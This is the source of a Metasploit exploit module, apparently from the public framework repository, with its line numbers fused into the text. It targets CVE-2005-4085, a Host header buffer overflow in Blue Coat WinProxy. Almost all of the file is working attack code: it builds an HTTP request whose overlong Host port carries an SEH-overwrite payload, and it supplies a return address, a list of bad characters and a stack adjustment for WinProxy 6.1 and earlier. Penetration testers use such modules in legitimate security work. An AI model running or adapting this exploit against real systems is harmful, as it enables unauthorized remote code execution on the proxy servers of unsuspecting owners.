Path: blob/master/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }910include Msf::Exploit::Remote::Tcp11include Msf::Exploit::Remote::Seh1213def initialize(info = {})14super(update_info(info,15'Name' => 'Blue Coat WinProxy Host Header Overflow',16'Description' => %q{17This module exploits a buffer overflow in the Blue Coat Systems WinProxy18service by sending a long port value for the Host header in a HTTP19request.20},21'Author' => 'MC',22'License' => MSF_LICENSE,23'References' =>24[25['CVE', '2005-4085'],26['OSVDB', '22238'],27['BID', '16147'],28['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],29],30'DefaultOptions' =>31{32'EXITFUNC' => 'thread',33},34'Payload' =>35{36'Space' => 600,37'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",38'StackAdjustment' => -3500,39},40'Platform' => 'win',41'Targets' =>42[43[ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll44],45'Privileged' => true,46'DisclosureDate' => '2005-01-05',47'DefaultTarget' => 0))4849register_options(50[51Opt::RPORT(80)52])5354end5556def exploit57connect5859print_status("Trying target #{target.name}...")6061sploit = "GET / HTTP/1.1" + "\r\n"62sploit += "Host: 127.0.0.1:"63sploit += rand_text_english(31, payload_badchars)64seh = generate_seh_payload(target.ret)65sploit[23, seh.length] = seh66sploit += "\r\n\r\n"6768sock.put(sploit)69sock.get_once(-1, 3)7071handler72disconnect73end74end757677